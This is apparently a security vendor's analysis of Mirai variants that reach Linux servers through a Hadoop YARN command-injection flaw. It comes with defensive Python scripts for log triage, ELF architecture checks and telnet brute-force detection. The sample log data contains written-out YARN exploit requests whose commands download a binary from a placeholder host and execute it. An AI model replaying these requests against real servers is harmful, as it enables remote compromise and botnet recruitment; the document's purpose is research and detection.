Mirai: Not Just for IoT Anymore

by ASERT Team on
  • Linux servers in datacenters have access to more bandwidth than IoT devices on residential networks, making them much more efficient DDoS bots. A handful of well-resourced Linux servers can generate attacks that compete with a much larger IoT botnet.

Details

The Hadoop YARN vulnerability is relatively simple – a command injection flaw that allows the attacker to execute arbitrary shell commands. Last month, Radware discovered this vulnerability being used to install the DemonBot DDoS bot. In many ways this flaw is similar to others we’ve seen exploited in IoT devices. For instance, CVE-2014-8361, a flaw in Realtek’s UPnP SOAP interface, is also exploitable by sending an HTTP request to a special port with specific parameters to induce the execution of shell commands. The Realtek vulnerability was used to deliver a Mirai variant. Our global network of honeypots has been tracking attempts to exploit the Hadoop YARN vulnerability. As seen in Fig 1, there are tens of thousands of exploit attempts per day.

Fig 1: Number of Hadoop YARN Exploit Attempts

What’s surprising is that so many exploit attempts are being delivered by only a handful of unique sources.

Fig 2 shows the number of unique source IP addresses delivering the Hadoop YARN exploit over the same time period.

Fig 2: Number of Unique Sources

If we look at the top 5 User-Agents delivering these exploits in Fig 3, we can see the attackers using the Python requests library to deliver the HTTP payload.

Fig 3: Top 5 User-Agents

The huge number of exploit attempts, coming from a small number of sources, coupled with the fact that none of the malware payloads we’ve seen try to propagate in a worm-able fashion using the Hadoop YARN exploit, and none of the payloads are written in Python, leads us to speculate that a small number of attackers are manually scanning the Internet to exploit this vulnerability. The exploit payloads we’ve seen, as shown in Fig 4, are all functionally identical – pull down a malware binary from a URL and execute it.

Fig 4: Typical Exploit

What does differ is which malware is delivered in the exploit. For the month of November, we’ve seen 225 unique binaries being delivered. 152 - well over half - of the binaries are being delivered by just one source address. At least a dozen of the samples we’ve examined are clearly variants of Mirai.
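The statistics behind Fig 1 through Fig 4 (attempts per day, unique sources, top User-Agents, and the download-and-execute command in each payload) can be reproduced from honeypot HTTP logs. The script below is an added example, not ASERT's honeypot tooling: the one-JSON-object-per-line log format, the source addresses, the timestamps and the `PAYLOAD-HOST-PLACEHOLDER` URLs are constructed for this example. The YARN ResourceManager REST paths it keys on (`POST /ws/v1/cluster/apps/new-application` and `POST /ws/v1/cluster/apps`, with the command in `am-container-spec.commands.command`) are the documented Hadoop API, used here only as detection anchors.

```python
"""Summarise constructed honeypot HTTP logs for Hadoop YARN exploit attempts.

Produces the same counts the post charts: attempts per day, unique source
addresses, top User-Agents, and the URL each payload fetches.
"""
import json
import re
from collections import Counter

# Constructed honeypot records, one JSON object per line (not real log data).
SAMPLE_LOG = r'''
{"ts":"2018-11-16T03:12:07Z","src":"203.0.113.10","method":"POST","path":"/ws/v1/cluster/apps/new-application","ua":"python-requests/2.20.0","body":""}
{"ts":"2018-11-16T03:12:08Z","src":"203.0.113.10","method":"POST","path":"/ws/v1/cluster/apps","ua":"python-requests/2.20.0","body":"{\"application-id\":\"application_1542337927000_0001\",\"application-name\":\"get-shell\",\"am-container-spec\":{\"commands\":{\"command\":\"cd /tmp; wget http://PAYLOAD-HOST-PLACEHOLDER/bins/x86 -O x86; chmod +x x86; ./x86\"}},\"application-type\":\"YARN\"}"}
{"ts":"2018-11-16T09:40:21Z","src":"198.51.100.7","method":"POST","path":"/ws/v1/cluster/apps","ua":"python-requests/2.18.4","body":"{\"application-id\":\"application_1542337927000_0002\",\"application-name\":\"x\",\"am-container-spec\":{\"commands\":{\"command\":\"curl -s http://PAYLOAD-HOST-PLACEHOLDER/x86 | sh\"}},\"application-type\":\"YARN\"}"}
{"ts":"2018-11-17T11:02:55Z","src":"203.0.113.10","method":"POST","path":"/ws/v1/cluster/apps","ua":"python-requests/2.20.0","body":"{\"application-id\":\"application_1542337927000_0003\",\"application-name\":\"get-shell\",\"am-container-spec\":{\"commands\":{\"command\":\"cd /tmp; wget http://PAYLOAD-HOST-PLACEHOLDER/bins/x86 -O x86; chmod +x x86; ./x86\"}},\"application-type\":\"YARN\"}"}
{"ts":"2018-11-17T12:00:00Z","src":"192.0.2.55","method":"GET","path":"/ws/v1/cluster/info","ua":"Mozilla/5.0","body":""}
'''

SUBMIT_PATH = "/ws/v1/cluster/apps"          # YARN RM REST: submit application
URL_RE = re.compile(r"https?://[^\s'\"]+")
FETCH_TOOL_RE = re.compile(r"\b(wget|curl)\b", re.IGNORECASE)


def parse_log(text: str) -> list:
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def submitted_command(rec: dict):
    """Return the am-container-spec command of a YARN app submission, else None."""
    if rec["method"] != "POST" or rec["path"] != SUBMIT_PATH or not rec["body"]:
        return None
    try:
        body = json.loads(rec["body"])
    except json.JSONDecodeError:
        return None
    commands = body.get("am-container-spec", {}).get("commands", {})
    return commands.get("command") if isinstance(commands, dict) else None


def is_exploit_attempt(rec: dict) -> bool:
    """An app submission whose command fetches something from a URL and runs it."""
    cmd = submitted_command(rec)
    return bool(cmd) and bool(URL_RE.search(cmd)) and bool(FETCH_TOOL_RE.search(cmd))


def summarise(records: list) -> dict:
    """The four views the post charts, computed from the flagged records."""
    attempts = [r for r in records if is_exploit_attempt(r)]
    per_day = Counter(r["ts"][:10] for r in attempts)
    sources = Counter(r["src"] for r in attempts)
    agents = Counter(r["ua"] for r in attempts)
    urls = Counter(u for r in attempts for u in URL_RE.findall(submitted_command(r)))
    return {
        "attempts_per_day": dict(per_day),
        "unique_sources": len(sources),
        "attempts_by_source": dict(sources),
        "top_user_agents": agents.most_common(5),
        "payload_urls": dict(urls),
    }


if __name__ == "__main__":
    print(json.dumps(summarise(parse_log(SAMPLE_LOG)), indent=2))
```

On real honeypot output, replace `SAMPLE_LOG` with the sensor's records in the same field layout; the `payload_urls` view is the one that turns a flood of identical requests into a short list of download hosts to block or sinkhole, and `attempts_by_source` is what shows the "152 binaries from one address" skew the post describes.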

Fig 5: “VPNFilter” Mirai Variant

Let’s focus on a Mirai variant that calls itself “VPNFilter” (2bcca8ac8d4d80f6740ef14d521284c0, Fig 5), even though it has nothing to do with the more advanced IoT bot. Across our honeypot network, we saw this exploit being delivered by two source addresses on Nov 16 - 185.244.25.241 and 104.248.170.199. The command-and-control site for this bot is the same IP address that hosts the binary. This particular variant differs from an IoT Mirai in an important way - it only delivers the x86 version of the bot. IoT Mirai variants will poke around a potential victim in order to deliver an executable that’s suitable for its CPU architecture – x86, x64, ARM, MIPS, ARC, etc. This version assumes the Hadoop YARN service is running on a commodity x86 Linux server. When running the “VPNFilter” variant in a sandbox, we immediately noticed it still tries to brute-force factory default usernames and passwords via telnet. If it successfully finds a vulnerable device, instead of directly installing the malware on the victim, it reports the IP address, username, and password to a reporting server, where the attacker can automate the installation of the bot.
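The x86-only observation above is the kind of thing an analyst verifies across a whole corpus of dropped binaries rather than one sample. The helper below is an added example, not ASERT's tooling: it reads the ELF identification bytes and `e_machine` field to label each sample's architecture, and the five "samples" are minimal headers constructed inline so the example runs offline (they are not real malware). The `e_machine` values are the ones from the ELF specification.

```python
"""Classify dropped ELF samples by CPU architecture.

An IoT Mirai dropper ships x86, x64, ARM, MIPS, ARC, ... builds; the
"VPNFilter" variant in the post only ships x86.  This triage helper makes
that difference visible from the ELF header alone.
"""
import struct
from collections import Counter

# e_machine values from the ELF specification / elf.h
EM_NAMES = {
    2: "SPARC", 3: "x86", 4: "m68k", 8: "MIPS", 20: "PowerPC", 40: "ARM",
    42: "SuperH", 62: "x86-64", 93: "ARCompact", 183: "AArch64", 195: "ARCv2",
}


def elf_arch(data: bytes) -> dict:
    """Return word size, endianness and machine name of an ELF image."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]              # EI_CLASS, EI_DATA
    bits = {1: 32, 2: 64}.get(ei_class)
    endian = {1: "<", 2: ">"}.get(ei_data)             # struct byte-order prefix
    if bits is None or endian is None:
        raise ValueError("malformed ELF identification")
    (e_machine,) = struct.unpack(endian + "H", data[18:20])   # e_machine at offset 18
    return {
        "bits": bits,
        "endian": "little" if endian == "<" else "big",
        "machine": EM_NAMES.get(e_machine, f"unknown(0x{e_machine:x})"),
    }


def make_header(ei_class: int, ei_data: int, e_machine: int) -> bytes:
    """Build a minimal 20-byte ELF header prefix (constructed test input only)."""
    endian = "<" if ei_data == 1 else ">"
    ident = b"\x7fELF" + bytes([ei_class, ei_data, 1]) + b"\x00" * 9   # 16-byte e_ident
    return ident + struct.pack(endian + "HH", 2, e_machine)            # e_type=ET_EXEC, e_machine


# Constructed stand-ins for binaries pulled from a multi-architecture dropper.
SAMPLES = {
    "bins.x86":    make_header(1, 1, 3),
    "bins.x86_64": make_header(2, 1, 62),
    "bins.arm":    make_header(1, 1, 40),
    "bins.mips":   make_header(1, 2, 8),     # big-endian MIPS
    "bins.arc":    make_header(1, 1, 93),
}


def arch_census(samples: dict) -> Counter:
    """Count samples per machine name; a dropper serving only x86 stands out."""
    return Counter(elf_arch(blob)["machine"] for blob in samples.values())


def x86_only(samples: dict) -> bool:
    return set(arch_census(samples)) <= {"x86"}


if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(name, elf_arch(blob))
    print("x86-only corpus:", x86_only(SAMPLES))
```

Pointed at a directory of samples (read the first 20 bytes of each file into `SAMPLES`), `arch_census` gives the per-architecture breakdown for a month of payloads, and `x86_only` is the one-line check for a server-focused dropper like the one described above.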

Conclusion

Mirai is no longer solely targeting IoT devices. While the techniques used to deliver Mirai to both IoT and Linux servers may be similar, it’s much easier for attackers to attack the x86 monoculture of Linux servers than the wide array of CPUs used in IoT devices. The limited number of sources we’ve seen continually scanning for the Hadoop YARN vulnerability may indicate this activity is the work of a small group of attackers. Their goal is clear – to install the malware on as many devices as possible. Once it gains a foothold, Mirai on a Linux server behaves much like an IoT bot and begins brute-forcing telnet usernames and passwords. What’s different now is that among the small devices in the botnet lurk fully powered Linux servers.
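The telnet brute-forcing described for the "VPNFilter" variant and restated in the conclusion is visible from the network side: a Hadoop node does not normally open TCP/23 to dozens of distinct addresses in a few minutes. The detector below is an added example, not ASERT's tooling; the flow-record tuples, the addresses, the `FANOUT_THRESHOLD` tuning and the port of the constructed "reporting server" check-in are all assumptions made for this example.

```python
"""Flag hosts that fan out over TCP/23 the way a Mirai-infected server does.

Input is a list of (timestamp, src, dst, dport) flow records.  A source that
reaches FANOUT_THRESHOLD or more distinct destinations on port 23 inside a
sliding WINDOW is alerted on; non-telnet peers of that source are listed so
the reporting-server connection described in the post can be followed up.
"""
from collections import defaultdict
from datetime import datetime, timedelta

TELNET_PORT = 23
FANOUT_THRESHOLD = 20            # distinct telnet targets per window (assumed tuning)
WINDOW = timedelta(minutes=10)

# Constructed flow log (timestamp, source, destination, destination port).
SAMPLE_FLOWS = [
    # a legitimate admin host: two telnet sessions to lab gear
    ("2018-11-16T10:00:05Z", "10.0.0.5", "10.0.9.1", 23),
    ("2018-11-16T10:02:05Z", "10.0.0.5", "10.0.9.2", 23),
] + [
    # a compromised Hadoop node: one telnet attempt per distinct target, seconds apart
    (f"2018-11-16T10:05:{i:02d}Z", "10.0.0.42", f"192.0.2.{i}", 23) for i in range(25)
] + [
    # the same node checking in to a constructed "reporting server" (port is arbitrary)
    ("2018-11-16T10:05:30Z", "10.0.0.42", "198.51.100.200", 5555),
]


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def telnet_fanout(flows, threshold=FANOUT_THRESHOLD, window=WINDOW) -> dict:
    """Return {src: details} for sources whose distinct-telnet-target count
    inside any `window` reaches `threshold`."""
    by_src = defaultdict(list)
    for ts, src, dst, dport in flows:
        if dport == TELNET_PORT:
            by_src[src].append((parse_ts(ts), dst))

    alerts = {}
    for src, events in by_src.items():
        events.sort()
        start, peak = 0, 0
        in_window = defaultdict(int)          # dst -> occurrences inside the window
        for i, (ts, dst) in enumerate(events):
            in_window[dst] += 1
            # slide the window start forward until events[start..i] fit in `window`
            while ts - events[start][0] > window:
                old = events[start][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            peak = max(peak, len(in_window))
        if peak >= threshold:
            alerts[src] = {
                "distinct_targets_in_window": peak,
                "first": events[0][0].isoformat(),
                "last": events[-1][0].isoformat(),
            }
    return alerts


def other_peers(flows, src: str) -> list:
    """Non-telnet destinations of a flagged source, for C2/report-server follow-up."""
    return sorted({(dst, dport) for _, s, dst, dport in flows
                   if s == src and dport != TELNET_PORT})


if __name__ == "__main__":
    for src, details in telnet_fanout(SAMPLE_FLOWS).items():
        print(src, details, other_peers(SAMPLE_FLOWS, src))
```

The sliding window keeps the check cheap enough to run over a day of NetFlow or conntrack exports; the threshold should be set above whatever legitimate telnet use the environment has, and any hit from a server that has no business speaking telnet at all is worth treating as a compromised host rather than a scan.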

